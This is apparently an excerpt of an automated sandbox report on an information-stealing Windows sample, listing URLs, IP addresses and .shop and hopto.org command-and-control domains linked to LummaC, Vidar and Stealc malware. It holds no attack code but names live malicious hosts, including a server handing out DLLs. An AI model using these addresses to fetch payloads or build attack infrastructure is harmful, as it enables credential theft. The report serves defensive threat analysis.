https://www.google.com/recaptcha/	RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown
http://cowod.AKJKJEBGCAK	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/msvcp140.dll0G	RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	GHDBKJ.13.dr, KFIJEG.3.dr	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	file.exe, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, KJEHJKJEBG.exe.3.dr	false	URL Reputation: safe	unknown
https://5.75.211.162/mozglue.dllD	RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://5.75.211.162/freebl3.dllrDH	RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown
https://5.75.211.162a	RegAsm.exe, 0000000D.00000002.2702734950.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.steampowered.com/en/	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/	RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://offensivedzvju.shop/~	RegAsm.exe, 00000009.00000002.2415665979.0000000001625000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://recaptcha.net/recaptcha/;	RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199780418869/inventory/	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	Avira URL Cloud: malware	unknown
Http://cowod.hopto.org/form-data;	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a	RegAsm.exe, 0000000D.00000002.2702734950.000000000051F000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	Avira URL Cloud: safe	unknown
http://cowod.hoptoIEBGCAK	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://reinforcenh.shop//	RegAsm.exe, 00000009.00000002.2416424402.000000000164D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://broadcast.st.dl.eccdnx.com	RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://offensivedzvju.shop/pi	RegAsm.exe, 00000009.00000002.2415665979.0000000001625000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.entrust.net/ts1ca.crl0	file.exe, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, KJEHJKJEBG.exe.3.dr	false	URL Reputation: safe	unknown
https://steamcommunity.com/workshop/	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	Avira URL Cloud: safe	unknown
https://login.steampowered.com/	RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/legal/	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.2414270008.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown
https://dbsmena.com/	RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	RegAsm.exe, 00000003.00000002.2384321664.000000000132A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp, EBAFBG.3.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	IEHJJE.3.dr	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199780418869	76561199780418869[1].htm.13.dr	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.EBGCAK	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162IJKJE	RegAsm.exe, 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://aia.entrust.net/ts1-chain256.cer01	file.exe, CBFBKFIDHI.exe.3.dr, vdshfd[1].exe.3.dr, ljhgfsd[1].exe.3.dr, KJEHJKJEBG.exe.3.dr	false	URL Reputation: safe	unknown
https://store.steampowered.com/	76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown
http://127.0.0.1:27060	RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://5.75.211.162/HJEBKJEGH	RegAsm.exe, 0000000D.00000002.2704852578.000000000121A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000052D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	Avira URL Cloud: safe	unknown
https://ghostreedmnu.shop/apiY	RegAsm.exe, 00000009.00000002.2414270008.00000000015AA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://reinforcenh.shop/l	RegAsm.exe, 00000009.00000002.2416424402.000000000164D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://5.75.211.1620.5938.132	RegAsm.exe, 0000000D.00000002.2702734950.0000000000563000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	RegAsm.exe, 00000003.00000002.2384321664.000000000132A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.0000000001342000.00000004.00000020.00020000.00000000.sdmp, EBAFBG.3.dr	false	URL Reputation: safe	unknown
https://api.steampowered.com/	RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/mobile	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2702734950.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown
https://dbsmena.com/vdshfd.exen	RegAsm.exe, 00000003.00000002.2387120277.00000000014F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://player.vimeo.com	RegAsm.exe, 0000000D.00000002.2704852578.0000000001261000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://fragnantbui.shop/apiU	RegAsm.exe, 00000009.00000002.2415665979.0000000001625000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://steamcommunity.com/?subsection=broadcasts	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	Avira URL Cloud: safe	unknown
http://cowod.hopto.org	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2384321664.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.2704852578.000000000127E000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr, 76561199780418869[1].htm.13.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.77.130	reinforcenh.shop	United States	13335	CLOUDFLARENETUS	true
104.21.4.136	gutterydhowi.shop	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	fragnantbui.shop	European Union	13335	CLOUDFLARENETUS	true
23.197.127.21	unknown	United States	20940	AKAMAI-ASN1EU	false
188.114.96.3	offensivedzvju.shop	European Union	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
104.21.2.13	ballotnwu.site	United States	13335	CLOUDFLARENETUS	true
104.21.58.182	drawzhotdog.shop	United States	13335	CLOUDFLARENETUS	true
5.75.211.162	unknown	Germany	24940	HETZNER-ASDE	true
172.105.54.160	dbsmena.com	United States	63949	LINODE-APLinodeLLCUS	false
45.132.206.251	cowod.hopto.org	Russian Federation	59731	LIFELINK-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519747
Start date and time:	2024-09-26 22:55:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@23/32@14/11
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 96 Number of non-executed functions: 233
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
16:56:28	API Interceptor	7x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.77.130	Notepad3_v6.23.203.2.exe	Get hash	malicious	Amadey, GO Backdoor	Browse	downloaddining3.com/h9fmdW7/index.php
	am.exe	Get hash	malicious	Amadey	Browse	downloaddining3.com/h9fmdW7/index.php
	am.exe	Get hash	malicious	Amadey	Browse	downloaddining3.com/h9fmdW7/index.php
104.21.4.136	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
188.114.97.3	ECChG5eWfZ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	homker11.uebki.one/GeneratorTest.php
	HpCQgSai4e.exe	Get hash	malicious	FormBook	Browse	www.zhxgtlw.top/bopi/?XtEdZRAP=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4J3RpZHG8N5&8p=DXgPYZ
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Ky4pZ0WB/download
	ADNOC requesting RFQ.exe	Get hash	malicious	FormBook	Browse	www.1win-moldovia.fun/1g7m/
	http://www.tiktok758.com/	Get hash	malicious	Unknown	Browse	www.tiktok758.com/img/logo.4c830710.svg
	TRmSF36qQG.exe	Get hash	malicious	FormBook	Browse	www.zhxgtlw.top/bopi/?0T5=UL08qvZHLtV&EnAHS=tIrAt1o0vWdNGbj/SzADcCGpASEIYc8Vm+jYIgWXaQC1p/Id9tI9XA8Ni4JOdI1EXss+
	PO5118000306 pdf.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/2wnz/
	(PO403810)_VOLEX_doc.exe	Get hash	malicious	Lokibot	Browse	dddotx.shop/Mine/PWS/fre.php
	QUOTATION_SEPQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/DiF66Hbf/download
	http://easyantrim.pages.dev/id.html	Get hash	malicious	HTMLPhisher	Browse	easyantrim.pages.dev/id.html

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
gutterydhowi.shop	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.4.136
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	104.21.4.136
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	172.67.132.32
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.21.4.136
cowod.hopto.org	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
steamcommunity.com	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Z09QznvZSr.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
fragnantbui.shop	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	3ZD5tEC5DH.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	a7HdB2dU5P.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	bYQ9uTqLzz.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Vidar	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	ECChG5eWfZ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.97.3
	https://netorgft2387211-my.sharepoint.com/:f:/g/personal/ben_generocityfoundation_com/EhzZ9tSokRNAoBEY50LGbOQBIYOddYigPFrRDcIpJLfA2w?e=t5itWH	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://justandbest.de	Get hash	malicious	Unknown	Browse	172.67.171.50
	https://docs.zoom.us/doc/c63Sae4RQ6OyTcxmh_zLzw?from=email&data=05%7C02%7CRyan.Deiter@americansignature.com%7Ce3b8b957491b4e36dfd108dcde65b619%7C5c02e89ab9684d4e960de62c7cd02766%7C0%7C0%7C638629775655136517%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=RMvLQDF1y92hR5HKChbiO0e0aKONAOKzPjDkQ4i5MTY=&reserved=0	Get hash	malicious	Unknown	Browse	172.64.151.101
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	172.67.208.139
	CLQD.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	172.67.208.139
	https://link.trustpilot.com/ls/click?upn=u001.j-2BMD1rpUvfXVasz-2BUEF8v0gLqESYoH9OAOsEpvf5KFmayNUiIMUjOj-2F6xodjiwswXbJ5_rTIZcwdFQl8UVV0MQoqEOCgBw9W2jwyOcNXSjRnCSMzbe6L3Ws0d2debfLDgpXs6CwbIbJZZu0mJQCWbk0Mk14nO-2BxU9-2Blvuk1zQgy1VNRLMg1mRxfI5Q1Of5KhvuoPcWQXwBfEAkkr-2Bvt3Og4Y94IbOhDED0tzgJSAB1f90rFx1hm7V7-2F8MmLwvZJdulRBMTVbBzixYtMU1elLHm4R6vA-3D-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==	Get hash	malicious	Unknown	Browse	104.26.4.39
	https://solvetherecaptcha404.webflow.io/404	Get hash	malicious	Unknown	Browse	104.18.160.117
	Daniel Leblanc shared _Incendie Hudson._ with you. #12.eml	Get hash	malicious	Unknown	Browse	104.16.117.116
CLOUDFLARENETUS	ECChG5eWfZ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.97.3
	https://netorgft2387211-my.sharepoint.com/:f:/g/personal/ben_generocityfoundation_com/EhzZ9tSokRNAoBEY50LGbOQBIYOddYigPFrRDcIpJLfA2w?e=t5itWH	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://justandbest.de	Get hash	malicious	Unknown	Browse	172.67.171.50
	https://docs.zoom.us/doc/c63Sae4RQ6OyTcxmh_zLzw?from=email&data=05%7C02%7CRyan.Deiter@americansignature.com%7Ce3b8b957491b4e36dfd108dcde65b619%7C5c02e89ab9684d4e960de62c7cd02766%7C0%7C0%7C638629775655136517%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=RMvLQDF1y92hR5HKChbiO0e0aKONAOKzPjDkQ4i5MTY=&reserved=0	Get hash	malicious	Unknown	Browse	172.64.151.101
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	172.67.208.139
	CLQD.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	172.67.208.139
	https://link.trustpilot.com/ls/click?upn=u001.j-2BMD1rpUvfXVasz-2BUEF8v0gLqESYoH9OAOsEpvf5KFmayNUiIMUjOj-2F6xodjiwswXbJ5_rTIZcwdFQl8UVV0MQoqEOCgBw9W2jwyOcNXSjRnCSMzbe6L3Ws0d2debfLDgpXs6CwbIbJZZu0mJQCWbk0Mk14nO-2BxU9-2Blvuk1zQgy1VNRLMg1mRxfI5Q1Of5KhvuoPcWQXwBfEAkkr-2Bvt3Og4Y94IbOhDED0tzgJSAB1f90rFx1hm7V7-2F8MmLwvZJdulRBMTVbBzixYtMU1elLHm4R6vA-3D-3D#Ymhhc2thci5zYW1iYXNpdmFuQHNhYW1hLmNvbQ==	Get hash	malicious	Unknown	Browse	104.26.4.39
	https://solvetherecaptcha404.webflow.io/404	Get hash	malicious	Unknown	Browse	104.18.160.117
	Daniel Leblanc shared _Incendie Hudson._ with you. #12.eml	Get hash	malicious	Unknown	Browse	104.16.117.116
CLOUDFLARENETUS	ECChG5eWfZ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.97.3
	https://netorgft2387211-my.sharepoint.com/:f:/g/personal/ben_generocityfoundation_com/EhzZ9tSokRNAoBEY50LGbOQBIYOddYigPFrRDcIpJLfA2w?e=t5itWH	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://justandbest.de	Get hash	malicious	Unknown	Browse	172.67.171.50
	https://docs.zoom.us/doc/c63Sae4RQ6OyTcxmh_zLzw?from=email&data=05%7C02%7CRyan.Deiter@americansignature.com%7Ce3b8b957491b4e36dfd108dcde65b619%7C5c02e89ab9684d4e960de62c7cd02766%7C0%7C0%7C638629775655136517%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=RMvLQDF1y92hR5HKChbiO0e0aKONAOKzPjDkQ4i5MTY=&reserved=0	Get hash	malicious	Unknown	Browse	172.64.151.101
	SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe	Get hash	malicious	LummaC	Browse	172.67.208.139
	CLQD.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	file.exe	Get hash	malicious	LummaC	Browse	172.67.208.139
